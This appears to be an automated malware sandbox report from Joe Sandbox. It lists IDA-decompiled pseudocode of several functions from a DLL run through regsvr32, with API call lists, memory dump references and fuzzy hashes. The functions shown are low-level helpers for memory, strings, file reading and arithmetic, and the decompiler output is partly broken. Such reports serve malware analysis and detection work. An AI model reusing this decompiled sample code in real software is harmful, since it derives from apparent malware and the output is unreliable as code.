Instruction Fuzzy Hash: 9C21BF723047D886E782EF66B80839ABA91B38CFD4F49C420FE498B755DE38C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800099F4 Relevance: 7.6, APIs: 6, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E000000011800099F4(void* __ebx, void* __ecx, void* __edx, void* __ebp, long long __rbx, void* __rcx, long long __rdx, void* __rsi, void* __rbp, intOrPtr* __r8, void* __r10, void* __r11, char _a8, long long _a16, long long _a24) {
				void* _v48;
				char _v56;
				char _v64;
				char _v72;
				intOrPtr _v80;
				long long _v88;
				void* __rdi;
				void* _t76;
				long long _t78;
				void* _t94;
				intOrPtr _t109;
				intOrPtr* _t118;

				_t95 = __rsi;
				_t92 = __rdx;
				_a24 = __rbx;
				_a16 = __rdx;
				_t109 =  *((intOrPtr*)(__rcx + 0x40));
				_t78 = __rdx;
				r10d =  *(_t109 + 2) & 0x0000ffff;
				_t118 = __r8;
				if ( *0x8000d4a0 - __r10 + 8 <= 0) goto 0x80009a51;
				_t76 = __r10 + _t109 + 8;
				if (( *0x8000d498 ^ 0xecb028fc) == 0) goto 0x80009a53;
				E00000001180004ED8(_t76, __rdx);
				goto 0x80009a53;
				if (_t76 == 0) goto 0x80009b5c;
				_t9 =  &_a8; // 0x52
				_t10 =  &_v56; // 0x12
				if (E000000011800094E0(__ebx, __ecx, _t78, _t76, _t94, __rsi, __rbp, _t10, _t9) != 0) goto 0x80009b61;
				_t11 = _t76 + 2; // 0x2
				if (_a8 - _t11 <= 0) goto 0x80009aa8;
				_t15 =  &_v64; // 0xa
				_t16 =  &_v48; // 0x1a
				E000000011800081F0(__ebx, _a8, _t78, _v56, _t95, _t16, _t15, __r11);
				goto 0x80009aad;
				if (0x57 != 0) goto 0x80009b36;
				r13d = _v64;
				_t19 =  &_v72; // 0x2
				_t20 =  &_v64; // 0xa
				_v80 = r13d;
				_v72 =  *_t118;
				_v88 = _v48;
				if (E00000001180006EB0(__ebx, __ecx,  *_t118, __ebp, _t78, _t78, _t92, _t20, _t19) != 0) goto 0x80009b16;
				memcpy(??, ??, ??);
				 *_t118 = _v72;
				HeapFree(??, ??, ??);
				goto 0x80009b1b;
				memset(??, ??, ??);
				HeapFree(??, ??, ??);
				r8d = _a8;
				memset(??, ??, ??);
				HeapFree(??, ??, ??);
				goto 0x80009b61;
				return 2;
			}

0x1800099f4
0x1800099f4
0x1800099f4
0x1800099f9
0x180009a0b
0x180009a16
0x180009a19
0x180009a36
0x180009a3c
0x180009a3e
0x180009a45
0x180009a4a
0x180009a4f
0x180009a56
0x180009a5c
0x180009a64
0x180009a77
0x180009a7d
0x180009a87
0x180009a95
0x180009a9a
0x180009a9f
0x180009aa6
0x180009aaf
0x180009ab5
0x180009ac2
0x180009ac7
0x180009acf
0x180009ad4
0x180009ad8
0x180009ae6
0x180009afc
0x180009b0b
0x180009b0e
0x180009b14
0x180009b23
0x180009b30
0x180009b36
0x180009b45
0x180009b54
0x180009b5a
0x180009b78

APIs

memcpy.NTDLL(?,0000000180005069), ref: 0000000180009AFC
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009B0E
memset.NTDLL(?,0000000180005069), ref: 0000000180009B23
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009B30
memset.NTDLL(?,0000000180005069), ref: 0000000180009B45
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009B54

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memset$memcpy
String ID:
API String ID: 4172471534-0
Opcode ID: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
Instruction ID: 54b9a56baf89d223affce05d04c9eed0c8a26e8b2822132c81dbcb815bbc5161
Opcode Fuzzy Hash: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
Instruction Fuzzy Hash: A9418E32204A8982EA92DB56E4007DBB7A1F7CDBD4F55C012FE8947759EF38C64ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008034 Relevance: 7.6, APIs: 6, Instructions: 78
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00000001180008034(signed int __edx, void* __ebp, long long __rbx, void* __rcx, long long __rsi, long long __r8, intOrPtr* __r9) {
				void* _t44;
				void* _t52;
				long long _t53;
				signed long long _t54;
				intOrPtr _t67;
				long _t68;
				long long _t70;
				long long _t74;
				void* _t77;
				intOrPtr* _t83;
				long _t87;
				void* _t88;
				void* _t90;
				struct _CRITICAL_SECTION* _t92;
				struct _CRITICAL_SECTION* _t96;

				_t52 = _t77;
				 *((long long*)(_t52 + 8)) = __rbx;
				 *((long long*)(_t52 + 0x10)) = _t74;
				 *((long long*)(_t52 + 0x20)) = __rsi;
				 *((long long*)(_t52 + 0x18)) = __r8;
				_t53 =  *0x8000d4a0;
				_t88 = __rcx;
				EnterCriticalSection(_t96);
				LeaveCriticalSection(_t92);
				HeapAlloc(_t90, _t87, _t68);
				_t70 = _t53;
				if (_t53 == __edx) goto 0x80008129;
				memset(??, ??, ??);
				EnterCriticalSection(??);
				r11d =  *((intOrPtr*)(__rcx + 0xa8));
				_t44 =  >=  ? r11d :  *((intOrPtr*)(__rcx + 0xa8));
				if (_t44 == 0) goto 0x80008111;
				_t54 = __edx + __edx * 4;
				_t14 = _t88 + 0x98; // 0x98
				_t16 = _t54 * 8; // 0xc
				_t83 = _t70 + _t16 + 0xc;
				_t67 =  *_t14;
				 *((intOrPtr*)(_t83 - 0xc)) =  *((intOrPtr*)(_t67 + 0x1c));
				 *((long long*)(_t83 + 0x14)) =  *((intOrPtr*)(_t67 + 0x10));
				 *_t83 =  *((intOrPtr*)(_t67 + 0x18));
				 *((intOrPtr*)(_t83 + 0x28 - 0x1c)) =  *((intOrPtr*)(_t67 + 0x18));
				if (_t44 + 0xffffffff != 0) goto 0x800080e7;
				LeaveCriticalSection(??);
				 *__r9 = __ebp + 1;
				 *((long long*)( *((intOrPtr*)(_t77 - 0x20 + 0x60)))) = _t70;
				goto 0x8000812e;
				return 8;
			}

APIs

EnterCriticalSection.KERNEL32 ref: 000000018000806F
LeaveCriticalSection.KERNEL32 ref: 0000000180008082
HeapAlloc.KERNEL32 ref: 000000018000809A
memset.NTDLL ref: 00000001800080B2
EnterCriticalSection.KERNEL32 ref: 00000001800080BC
LeaveCriticalSection.KERNEL32 ref: 0000000180008116

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocHeapmemset
String ID:
API String ID: 3215818008-0
Opcode ID: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
Instruction ID: 1a3dd1e818266afc597f0a591a41220640f3dae03b5c6049ded73bf0a5c13329
Opcode Fuzzy Hash: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
Instruction Fuzzy Hash: F731A9B2A00B4896DB81CF5AE84878D77A0F748BD4F858026EF4D93360DF34CA9AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002668 Relevance: 7.6, APIs: 6, Instructions: 76memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?,?,00000001,00000001800058DA,?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000269E
HeapAlloc.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026B0
lstrcpyA.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026DB
CloseHandle.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002724
GetLastError.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000272C
HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002741

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heap$AllocCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2779700050-0
Opcode ID: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
Instruction ID: 8ed8152a395896e124fdee7dd42a1db6533dceb9cab86c829ebc78b2e775e80d
Opcode Fuzzy Hash: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
Instruction Fuzzy Hash: 8221AD36604788C6E7A6DF52B84039AB7A0B78CBE0F48C425FE9A47764CF38D649C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003698 Relevance: 7.6, APIs: 5, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00000001180003698(void* __ecx, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, short _a32) {
				void* _v32;
				short _v38;
				short _v40;
				long long _v48;
				signed short _v54;
				signed short _v56;
				void* __rsi;
				void* _t20;
				void* _t21;
				void* _t25;
				void* _t29;
				short _t33;
				signed short _t35;
				long long _t47;
				void* _t59;
				struct _EXCEPTION_RECORD _t62;
				void* _t63;
				void* _t68;
				void* _t78;
				void* _t79;

				_t48 = __rbx;
				_t78 = _t68;
				 *((long long*)(_t78 + 8)) = __rbx;
				 *((long long*)(_t78 + 0x10)) = __rbp;
				_t47 =  *0x8000d4a0;
				_t63 = __r8;
				_t21 = E00000001180001000(_t20, _t29, __ecx, __rbx, _t78 - 0x20, __rdx, _t78 + 0x20, _t78, _t79, _t59);
				r12d = 0;
				if (_t21 != r12d) goto 0x8000376a;
				_t33 = _a32;
				_v38 = _t33;
				_v40 = _t33;
				_t35 = _t33 + 1 + _t33 + 1;
				_v54 = _t35;
				r8d = _t35 & 0x0000ffff;
				HeapAlloc(??, ??, ??);
				_v48 = _t47;
				if (_t47 == _t79) goto 0x8000375a;
				r8d = 0;
				_v56 = r12w;
				if (RtlOemStringToUnicodeString(_t62) - r12d >= 0) goto 0x80003731;
				RtlNtStatusToDosError(??);
				goto 0x80003748;
				_t25 = E00000001180005A0C((_v56 & 0x0000ffff) >> 1, _t48, _v48, _t63, __rdx, __rdx, _t63);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				return _t25;
			}

0x180003698
0x180003698
0x18000369b
0x18000369f
0x1800036ab
0x1800036b2
0x1800036c4
0x1800036c9
0x1800036d1
0x1800036d7
0x1800036dd
0x1800036e2
0x1800036ea
0x1800036ed
0x1800036f2
0x1800036f9
0x1800036ff
0x180003707
0x180003713
0x180003716
0x180003725
0x180003729
0x18000372f
0x180003743
0x180003754
0x180003764
0x18000377e

APIs

Part of subcall function 0000000180001000: CreateFileW.KERNEL32 ref: 000000018000104A
Part of subcall function 0000000180001000: GetFileSize.KERNEL32 ref: 000000018000105E
Part of subcall function 0000000180001000: CloseHandle.KERNEL32 ref: 00000001800010D9
Part of subcall function 0000000180001000: HeapFree.KERNEL32 ref: 00000001800010F0

HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 00000001800036F9
RtlOemStringToUnicodeString.NTDLL ref: 000000018000371C
RtlNtStatusToDosError.NTDLL ref: 0000000180003729
HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003754
HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003764

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heap$Free$FileString$AllocCloseCreateErrorHandleSizeStatusUnicode
String ID:
API String ID: 45859668-0
Opcode ID: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
Instruction ID: f5e01ebc0847fc45ed597bc040b189ed2f2401146e9d5498dfbecc36209ca11f
Opcode Fuzzy Hash: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
Instruction Fuzzy Hash: 6D217172218B5881E6A1DB26E44579E73A1FB8CBD4F549521FA8E83768DF38C649CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800033B4 Relevance: 6.4, APIs: 5, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E000000011800033B4(void* __eax, void* __edi, void* __eflags, long long __rbx, long long __rcx, long long __rdx, void* __r8, signed int __r9) {
				void* __rdi;
				void* _t65;
				intOrPtr _t66;
				void* _t80;
				intOrPtr _t88;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t107;
				signed long long _t109;
				void* _t114;
				void* _t122;
				signed long long _t125;
				signed long long _t132;
				intOrPtr* _t133;
				intOrPtr _t141;
				void* _t156;
				intOrPtr _t157;
				void* _t159;
				signed long long _t161;
				intOrPtr* _t162;
				void* _t165;
				void* _t167;
				void* _t168;
				intOrPtr* _t173;
				void* _t181;
				signed long long _t183;
				signed long long _t184;
				int _t187;
				int _t189;
				void* _t193;

				 *((long long*)(_t167 + 0x18)) = __rbx;
				 *((long long*)(_t167 + 0x10)) = __rdx;
				 *((long long*)(_t167 + 8)) = __rcx;
				_t168 = _t167 - 0x660;
				_t157 =  *((intOrPtr*)(_t168 + 0x6c0));
				r13d = r9d;
				r9d =  *((intOrPtr*)(_t168 + 0x6c8));
				r9d = r9d - 1;
				_t125 = r9d - 1;
				if (__eflags < 0) goto 0x80003400;
				if ( *((intOrPtr*)(_t157 + _t125 * 4)) == 0) goto 0x800033f1;
				_t107 = __r9 + 1;
				 *((intOrPtr*)(_t168 + 0x28)) = _t107;
				if (_t107 == 0) goto 0x80003641;
				_t13 = _t125 + 0x20; // 0x20
				r14d = _t13;
				if ( *((intOrPtr*)(_t157 + _t125 * 4)) == 0) goto 0x8000342d;
				_t114 = 0 - r14d;
				if (_t114 >= 0) goto 0x8000342d;
				if (_t114 != 0) goto 0x80003422;
				r14d = r14d - 1;
				r8d = _t107;
				 *((intOrPtr*)(_t168 + 0x20)) = r14d;
				_t65 = memset(_t193, _t189, _t187);
				_t16 = _t168 + 0x250; // 0x249
				r9d = r13d;
				r8d = r14d;
				_t132 = _t187 << 2;
				_t66 = E00000001180008AD0(_t65, __edi, _t114, _t132, _t16, __r8, _t157, _t181);
				_t17 = _t168 + 0x40; // 0x39
				r9d = _t107;
				 *((intOrPtr*)(_t168 + _t132 + 0x250)) = _t66;
				E00000001180008AD0(_t66, __edi, _t114, _t132, _t17, _t157, _t157, _t156);
				_t102 =  *((intOrPtr*)(_t168 + 0x40 + _t161 * 4));
				 *((intOrPtr*)(_t168 + 0x24)) = _t102;
				memset(_t165, ??);
				r13d = r13d - _t107;
				_t141 = _t107;
				_t183 = r13d;
				 *(_t168 + 0x30) = _t183;
				if (_t114 < 0) goto 0x800035ee;
				_t126 = _t183 + _t141;
				_t28 = _t183 * 4; // 0x249
				_t162 = _t168 + _t28 + 0x250;
				r9d = 0xffffffff;
				_t31 = _t126 * 4; // 0x249
				_t133 = _t168 + _t31 + 0x250;
				if (_t102 != r9d) goto 0x800034d0;
				_t103 =  *_t133;
				goto 0x800034fb;
				r8d = _t157 + 1;
				_t159 =  >  ? __r9 : (_t183 + _t141 << 0x20) + _t141 + _t183;
				_t44 = _t168 + 0x40; // 0x39
				_t173 = _t162;
				r10d = _t107;
				if (_t103 == 0) goto 0x8000357a;
				r12d = 0xffffffff;
				r9d =  *_t44;
				_t88 =  *_t162;
				r10d = r10d + r12d;
				_t178 = __r9 * _t165;
				 *_t173 = _t88;
				if (_t88 - r12d <= 0) goto 0x80003548;
				goto 0x8000354a;
				 *_t173 =  *_t173 - r9d;
				if ( *_t173 - r12d - r9d <= 0) goto 0x80003565;
				goto 0x80003567;
				if (r10d != 0) goto 0x80003517;
				_t109 =  *((intOrPtr*)(_t168 + 0x28));
				_t184 =  *(_t168 + 0x30);
				 *_t133 =  *_t133 - 0 + 0 + r11d;
				if ( *_t133 != 0) goto 0x80003595;
				_t47 = _t168 + 0x40; // 0x39
				r8d = _t109;
				_t122 = E000000011800049DC( *_t173, (_t183 + _t141 << 0x20) + _t141 + _t183, _t162, _t47, _t173 + 4);
				if (_t122 < 0) goto 0x800035ae;
				_t48 = _t168 + 0x40; // 0x39
				r9d = _t109;
				 *_t133 =  *_t133 - E00000001180004D74(_t78,  *_t173, 0 + 0 + r11d, (_t183 + _t141 << 0x20) + _t141 + _t183, _t133, _t162, _t162, _t48);
				goto 0x8000357c;
				 *((intOrPtr*)( *((intOrPtr*)(_t168 + 0x6a0)) + _t184 * 4)) = _t103 + 1;
				r13d = r13d - 1;
				 *(_t168 + 0x30) = _t184 - 1;
				r9d = 0xffffffff;
				if (_t122 >= 0) goto 0x800034c7;
				r14d =  *((intOrPtr*)(_t168 + 0x20));
				r8d =  *((intOrPtr*)(_t168 + 0x6c8));
				_t80 = memset(??, ??, ??);
				_t57 = _t168 + 0x250; // 0x249
				r9d = _t109;
				r8d = r14d;
				E00000001180007220(_t80,  *((intOrPtr*)(_t168 + 0x24)), _t122, _t133 - 4,  *((intOrPtr*)(_t168 + 0x6a8)), _t57, _t159, _t178, _t161);
				r8d = 0x40c;
				memset(??, ??, ??);
				r8d = 0x204;
				return memset(??, ??, ??);
			}

APIs

memset.NTDLL ref: 0000000180003446
memset.NTDLL ref: 0000000180003494
memset.NTDLL ref: 00000001800035FF
memset.NTDLL ref: 000000018000362A
memset.NTDLL ref: 000000018000363C

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
Instruction ID: ec3f035d16c0e924505bfe3f3cda61bac28d8e6f0fc5c54ff73492b97cc3beba
Opcode Fuzzy Hash: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
Instruction Fuzzy Hash: EE61F532704A8486E772CE27E8457DABB95F3D8BC8F448125EE4953B98DF39E605CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007760 Relevance: 6.4, APIs: 5, Instructions: 148memoryCOMMON

Download Yara Rule

APIs

memcmp.NTDLL ref: 000000018000783B
HeapFree.KERNEL32 ref: 000000018000787A
memcmp.NTDLL ref: 00000001800078A0
memcmp.NTDLL ref: 00000001800078C6
HeapFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180006A05), ref: 0000000180007930

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: memcmp$FreeHeap
String ID:
API String ID: 1680564963-0
Opcode ID: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
Instruction ID: e13f11c4693d54ee7f56904197b6c81cc0d09359d032e1af4ae6464abc78b12e
Opcode Fuzzy Hash: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
Instruction Fuzzy Hash: 4551A172B0878955EBA2CB15A4843DA77A1A7AD7C4F54C025EE8C43786EE3DC64DC701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001EEC Relevance: 6.4, APIs: 5, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00000001180001EEC(void* __edi, void* __eflags, long long __rbx, long long __rcx, void* __rdx, void* __r8) {
				void* __rsi;
				void* _t65;
				signed int _t66;
				unsigned int _t67;
				signed int _t74;
				void* _t79;
				unsigned int _t86;
				void* _t88;
				void* _t92;
				void* _t113;
				int _t117;
				long long _t123;
				void* _t126;
				void* _t127;
				int _t144;
				void* _t146;
				void* _t149;

				_t79 = __eflags;
				_t88 = _t126;
				 *((long long*)(_t88 + 0x10)) = __rbx;
				 *((long long*)(_t88 + 0x18)) = _t123;
				 *((long long*)(_t88 + 8)) = __rcx;
				_t127 = _t126 - 0x860;
				r14d =  *((intOrPtr*)(_t127 + 0x8b8));
				_t92 = __rdx;
				 *(_t127 + 0x30) = _t149 << 2;
				memcpy(_t149, _t146, _t144);
				_t9 = _t127 + 0x454; // 0x4a5
				 *((intOrPtr*)(_t127 + 0x20)) = r14d;
				E00000001180003934(_t65, __rdx, _t9, _t149 << 2,  *((intOrPtr*)(_t127 + 0x8b0)));
				_t13 = _t127 + 0x658; // 0x6a9
				 *((intOrPtr*)(_t127 + 0x20)) = r14d;
				E00000001180003934(_t65, _t92, _t13, _t149 << 2,  *((intOrPtr*)(_t127 + 0x8b0)));
				memset(_t113, _t117);
				 *((intOrPtr*)(_t127 + 0x40)) = 1;
				_t74 = __edi - 1;
				if (_t79 < 0) goto 0x80001faa;
				if ( *((intOrPtr*)(__r8 + (r9d - 1) * 4)) == 0) goto 0x80001f9a;
				r12d = _t74;
				if (_t74 < 0) goto 0x80002081;
				_t66 =  *(__r8 + _t74 * 4);
				if (_t74 != r12d) goto 0x80001fe8;
				if ((_t66 & 0xc0000000) != 0) goto 0x80001fe8;
				_t67 = _t66 << 2;
				if ((_t67 & 0xc0000000) == 0) goto 0x80001fd2;
				if (0x10000001e == 0) goto 0x80002075;
				 *((intOrPtr*)(_t127 + 0x20)) = r14d;
				E00000001180003934(_t67, _t92, _t127 + 0x40, _t74,  *((intOrPtr*)(_t127 + 0x8b0)));
				 *((intOrPtr*)(_t127 + 0x20)) = r14d;
				E00000001180003934(_t67, _t92, _t127 + 0x40, _t74,  *((intOrPtr*)(_t127 + 0x8b0)));
				_t86 = _t67 >> 0x1e;
				if (_t86 == 0) goto 0x80002068;
				 *((intOrPtr*)(_t127 + 0x20)) = r14d;
				E00000001180003934(_t67, _t92, _t127 + 0x40, _t74,  *((intOrPtr*)(_t127 + 0x8b0)));
				if (_t86 != 0) goto 0x80001fef;
				if (_t86 >= 0) goto 0x80001fbb;
				memcpy(??, ??, ??);
				r8d = 0x60c;
				memset(??, ??, ??);
				r8d = 0x204;
				return memset(??, ??, ??);
			}

APIs

memcpy.NTDLL ref: 0000000180001F31

Part of subcall function 0000000180003934: memset.NTDLL ref: 0000000180003985

memset.NTDLL ref: 0000000180001F8A
memcpy.NTDLL ref: 0000000180002093
memset.NTDLL ref: 00000001800020A8
memset.NTDLL ref: 00000001800020BA

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
Instruction ID: c336bcc7fd0d3219ccdcc3e7649660a569ab46c29ccafd654ab2136e7df858a2
Opcode Fuzzy Hash: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
Instruction Fuzzy Hash: ED416272204BCA95EB61DA12E4443EAB364F7D9BC4F418111FF8857B89DF39C60ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006108 Relevance: 6.4, APIs: 5, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00000001180006108(signed int __rbx, long long __rcx, void* __rdx, void* __r8, char _a8, long long _a16, intOrPtr _a24, intOrPtr _a48, intOrPtr _a56, long long _a64) {
				long long _v72;
				long long _v88;
				void* __rsi;
				void* __rbp;
				void* __r15;
				intOrPtr _t40;
				void* _t48;
				void* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr* _t75;
				signed long long _t92;
				void* _t94;
				void* _t110;
				void* _t112;
				intOrPtr* _t114;

				_t74 = __rbx;
				_a16 = __rbx;
				_a8 = __rcx;
				_t71 =  *0x8000d4a0;
				_t58 = r8d;
				_v72 =  *((intOrPtr*)(_t71 + 8));
				_t8 = _t92 + 8; // 0x8
				r14d = _t8;
				HeapAlloc(??, ??, ??);
				if (_t71 == 0) goto 0x8000627d;
				if (_t58 == 0) goto 0x800061f7;
				_t114 = __rdx + 0x20;
				E00000001180006008(_t59, __rbx, __rcx, _t94, __rdx + (__rbx + __rbx * 4) * 8);
				if (_t71 == 0) goto 0x800061ec;
				r9d =  *((intOrPtr*)(_t114 - 8));
				_v88 = _t71 + (_t92 + _t92 * 2) * 8;
				_a24 = E00000001180006344(_t48, 0, _t71, _t74, _a8, _t71, _t94,  *_t114, _t110, _t112);
				HeapFree(??, ??, ??);
				_t40 = _a24;
				if (_t40 == 0) goto 0x800061ec;
				_t57 = 0 + _t40;
				if (1 - _t58 < 0) goto 0x80006176;
				r14d = 8;
				if (1 != _t58) goto 0x80006225;
				_v88 = _a64;
				r14d = E00000001180007444(_t40, _t57, _t74, _t71, _a48, _a56, _a8);
				if (_t57 == 0) goto 0x8000626f;
				_t31 =  &_a8; // 0x8
				_t75 = _t31;
				if ( *_t75 == 0) goto 0x8000624b;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t75 - 8)) == 0) goto 0x80006265;
				_t69 =  *((intOrPtr*)(_t75 + 0xc));
				if (_t69 == 0) goto 0x80006265;
				HeapFree(??, ??, ??);
				if (_t69 != 0) goto 0x80006238;
				HeapFree(??, ??, ??);
				return r14d;
			}

APIs

HeapAlloc.KERNEL32 ref: 0000000180006151
HeapFree.KERNEL32 ref: 00000001800061C7
HeapFree.KERNEL32 ref: 0000000180006245
HeapFree.KERNEL32 ref: 000000018000625F
HeapFree.KERNEL32 ref: 0000000180006277

Part of subcall function 0000000180006008: lstrlenA.KERNEL32(?,?,00000000,0000000180006189), ref: 0000000180006042
Part of subcall function 0000000180006008: HeapAlloc.KERNEL32 ref: 0000000180006057
Part of subcall function 0000000180006008: _snprintf.NTDLL ref: 00000001800060B9
Part of subcall function 0000000180006008: lstrcpyA.KERNEL32 ref: 00000001800060DD

Part of subcall function 0000000180006344: Sleep.KERNEL32(00000000,00000001800061B8), ref: 000000018000638C
Part of subcall function 0000000180006344: GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180006397
Part of subcall function 0000000180006344: lstrlenA.KERNEL32 ref: 00000001800063E6
Part of subcall function 0000000180006344: lstrlenA.KERNEL32 ref: 00000001800063F2
Part of subcall function 0000000180006344: HeapAlloc.KERNEL32 ref: 0000000180006405
Part of subcall function 0000000180006344: lstrcpyA.KERNEL32 ref: 000000018000641D
Part of subcall function 0000000180006344: lstrcatA.KERNEL32 ref: 0000000180006444
Part of subcall function 0000000180006344: lstrcatA.KERNEL32 ref: 0000000180006450
Part of subcall function 0000000180006344: lstrlenA.KERNEL32 ref: 0000000180006482
Part of subcall function 0000000180006344: HeapAlloc.KERNEL32 ref: 000000018000649B

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

